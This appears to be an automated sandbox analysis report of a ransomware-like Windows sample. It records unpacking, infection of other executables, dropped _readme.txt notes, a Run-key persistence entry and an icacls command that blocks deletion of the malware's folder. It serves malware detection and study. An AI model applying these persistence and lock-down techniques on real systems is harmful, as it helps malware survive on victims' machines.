          Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\Ik source: DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe, 0000000C.00000003.2509824074.0000000003129000.00000004.00000020.00020000.00000000.sdmp, DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe, 0000000C.00000003.2479214046.0000000003141000.00000004.00000020.00020000.00000000.sdmp, DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe, 0000000C.00000003.2479627588.000000000314E000.00000004.00000020.00020000.00000000.sdmp, DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe, 0000000C.00000003.2490960191.0000000003141000.00000004.00000020.00020000.00000000.sdmp, DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe, 0000000C.00000002.2520302187.0000000003129000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\ source: DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe, 0000000C.00000003.2466953934.000000000318E000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\g source: DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe, 0000000C.00000003.2466953934.000000000318E000.00000004.00000020.00020000.00000000.sdmp, DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe, 0000000C.00000003.2467451110.0000000003199000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\ts\ source: DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe, 0000000C.00000003.2475180674.0000000003177000.00000004.00000020.00020000.00000000.sdmp, DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe, 0000000C.00000003.2467011907.000000000317E000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: d:\dbs\sh\odct\1105_210049_0\client\onedrive\Setup\Standalone\exe\obj\i386\OneDriveSetup.pdb source: wctDE6E.tmp.12.dr
          Source: Binary string: C:\tuciyuvowafo82\vexeyokisi\modoyisi xub.pdbh source: DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe

          Data Obfuscation

          barindex
          Detected unpacking (changes PE section rights)
          Source: C:\Users\user\AppData\Local\Temp\HhVfIB.exeUnpacked PE file: 1.2.HhVfIB.exe.d10000.1.unpack .text:EW;.rdata:W;.data:W;.reloc:W;.aspack:EW;.adata:EW; vs .text:ER;.rdata:R;.data:W;.reloc:R;.aspack:EW;.adata:EW;
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeUnpacked PE file: 6.2.DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R;5ua:EW; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeUnpacked PE file: 12.2.DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R;5ua:EW; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
          Source: C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeUnpacked PE file: 22.2.DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R;5ua:EW; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
          Source: C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeUnpacked PE file: 25.2.DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R;5ua:EW; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
          Source: C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeUnpacked PE file: 28.2.DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R;5ua:EW; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
          Source: C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeUnpacked PE file: 30.2.DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R;5ua:EW; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
          Detected unpacking (overwrites its own PE header)
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeUnpacked PE file: 6.2.DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe.400000.0.unpack
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeUnpacked PE file: 12.2.DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe.400000.0.unpack
          Source: C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeUnpacked PE file: 22.2.DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe.400000.0.unpack
          Source: C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeUnpacked PE file: 25.2.DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe.400000.0.unpack
          Source: C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeUnpacked PE file: 28.2.DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe.400000.0.unpack
          Source: C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeUnpacked PE file: 30.2.DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe.400000.0.unpack
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCode function: 0_2_00416B40 LoadLibraryA,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__encode_pointer,__encode_pointer,__encode_pointer,__encode_pointer,__encode_pointer,0_2_00416B40
          Source: initial sampleStatic PE information: section where entry point is pointing to: 5ua
          Source: DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeStatic PE information: section name: 5ua
          Source: Uninstall.exe.1.drStatic PE information: section name: EpNuZ
          Source: MyProg.exe.1.drStatic PE information: section name: PELIB
          Source: MyProg.exe.1.drStatic PE information: section name: Y|uR
          Source: SciTE.exe.1.drStatic PE information: section name: u
          Source: DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe.6.drStatic PE information: section name: 5ua
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCode function: 0_2_00408DE2 push ecx; mov dword ptr [esp], 00000000h0_2_00408DF1
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCode function: 0_2_00408E40 push ecx; mov dword ptr [esp], 00000000h0_2_00408E41
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCode function: 0_2_004EFE7B push ebp; ret 0_2_004EFE7E
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCode function: 0_2_00408E10 push ecx; mov dword ptr [esp], 00000002h0_2_00408E11
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCode function: 0_2_004EFE85 push 00000000h; ret 0_2_004F0296
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCode function: 0_2_021560AF push ecx; retf 0_2_021560B2
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCode function: 0_2_02218F05 push ecx; ret 0_2_02218F18
          Source: C:\Users\user\AppData\Local\Temp\HhVfIB.exeCode function: 1_2_00D11638 push dword ptr [00D13084h]; ret 1_2_00D1170E
          Source: C:\Users\user\AppData\Local\Temp\HhVfIB.exeCode function: 1_2_00D16014 push 00D114E1h; ret 1_2_00D16425
          Source: C:\Users\user\AppData\Local\Temp\HhVfIB.exeCode function: 1_2_00D12D9B push ecx; ret 1_2_00D12DAB
          Source: C:\Users\user\AppData\Local\Temp\HhVfIB.exeCode function: 1_2_00D1600A push ebp; ret 1_2_00D1600D
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCode function: 6_2_00428565 push ecx; ret 6_2_00428578
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCode function: 9_2_0213C0AF push ecx; retf 9_2_0213C0B2
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCode function: 9_2_021F8F05 push ecx; ret 9_2_021F8F18
          Source: C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCode function: 10_2_007BC0AF push ecx; retf 10_2_007BC0B2
          Source: C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCode function: 10_2_02338F05 push ecx; ret 10_2_02338F18
          Source: DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeStatic PE information: section name: 5ua entropy: 6.934599559139523
          Source: Uninstall.exe.1.drStatic PE information: section name: EpNuZ entropy: 6.934462024130096
          Source: MyProg.exe.1.drStatic PE information: section name: Y|uR entropy: 6.935091579656329
          Source: SciTE.exe.1.drStatic PE information: section name: u entropy: 6.934879433604632
          Source: DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe.6.drStatic PE information: section name: 5ua entropy: 6.934599559139523

          Persistence and Installation Behavior

          barindex
          Infects executable files (exe, dll, sys, html)
          Source: C:\Users\user\AppData\Local\Temp\HhVfIB.exeSystem file written: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\HhVfIB.exeSystem file written: C:\Program Files\7-Zip\Uninstall.exeJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\HhVfIB.exeSystem file written: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exeJump to behavior
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeSystem file written: C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\LocalState\ThirdPartyNotice.htmlJump to behavior
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeFile created: C:\Users\user\Local Settings\Temp\wctDE6E.tmp.wdlo (copy)Jump to dropped file
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeFile created: C:\Users\user\AppData\Local\Temp\tmpAAA2.tmpJump to dropped file
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeFile created: C:\Users\user\AppData\Local\Temp\HhVfIB.exeJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\HhVfIB.exeFile created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJump to dropped file
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeFile created: C:\Users\user\AppData\Local\Temp\chrome.exeJump to dropped file
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeFile created: C:\Users\jones\Local Settings\Temp\wctF86A.tmp.wdlo (copy)Jump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\HhVfIB.exeFile created: C:\Program Files\7-Zip\Uninstall.exeJump to dropped file
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeFile created: C:\Users\jones\AppData\Local\Temp\wctF86A.tmpJump to dropped file
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeFile created: C:\Users\user\Local Settings\Temp\chrome.exe.wdlo (copy)Jump to dropped file
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeFile created: C:\Users\jones\Local Settings\Temp\wct3D66.tmp.wdlo (copy)Jump to dropped file
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeFile created: C:\Users\user\AppData\Local\Temp\wctDE6E.tmpJump to dropped file
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeFile created: C:\Users\user\Local Settings\Temp\HhVfIB.exe.wdlo (copy)Jump to dropped file
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeFile created: C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\HhVfIB.exeFile created: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exeJump to dropped file
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeFile created: C:\Users\jones\AppData\Local\Temp\wct3D66.tmpJump to dropped file
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeFile created: C:\Users\user\Local Settings\Temp\tmpAAA2.tmp.wdlo (copy)Jump to dropped file
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeFile created: C:\_readme.txtJump to behavior
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeFile created: C:\$WinREAgent\_readme.txtJump to behavior
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeFile created: C:\$WinREAgent\Scratch\_readme.txtJump to behavior
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeFile created: C:\Users\user\_readme.txtJump to behavior
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeFile created: C:\Users\jones\_readme.txtJump to behavior
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SysHelperJump to behavior
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SysHelperJump to behavior

          Hooking and other Techniques for Hiding and Protection

          barindex
          Uses known network protocols on non-standard ports
          Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 799
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCode function: 6_2_00481920 GetVersionExA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,CloseHandle,FreeLibrary,GlobalMemoryStatus,GetCurrentProcessId,6_2_00481920
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
          Source: C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeProcess created: C:\Windows\SysWOW64\icacls.exe icacls "C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15" /deny *S-1-1-0:(OI)(CI)(DE,DC)
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\HhVfIB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\HhVfIB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\HhVfIB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCode function: 0_2_0215471C rdtsc 0_2_0215471C
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCode function: _malloc,_malloc,_wprintf,_free,GetAdaptersInfo,_free,_malloc,GetAdaptersInfo,_sprintf,_wprintf,_wprintf,_free,6_2_0040E670
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeThread delayed: delay time: 900000
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeDropped PE file which has not been started: C:\Users\user\Local Settings\Temp\wctDE6E.tmp.wdlo (copy)Jump to dropped file
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\tmpAAA2.tmpJump to dropped file
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\HhVfIB.exeJump to dropped file
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\chrome.exeJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\HhVfIB.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJump to dropped file
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeDropped PE file which has not been started: C:\Users\jones\Local Settings\Temp\wctF86A.tmp.wdlo (copy)Jump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\HhVfIB.exeDropped PE file which has not been started: C:\Program Files\7-Zip\Uninstall.exeJump to dropped file
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeDropped PE file which has not been started: C:\Users\jones\AppData\Local\Temp\wctF86A.tmpJump to dropped file
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeDropped PE file which has not been started: C:\Users\jones\Local Settings\Temp\wct3D66.tmp.wdlo (copy)Jump to dropped file
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeDropped PE file which has not been started: C:\Users\user\Local Settings\Temp\chrome.exe.wdlo (copy)Jump to dropped file
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\wctDE6E.tmpJump to dropped file
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeDropped PE file which has not been started: C:\Users\user\Local Settings\Temp\HhVfIB.exe.wdlo (copy)Jump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\HhVfIB.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exeJump to dropped file
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeDropped PE file which has not been started: C:\Users\jones\AppData\Local\Temp\wct3D66.tmpJump to dropped file
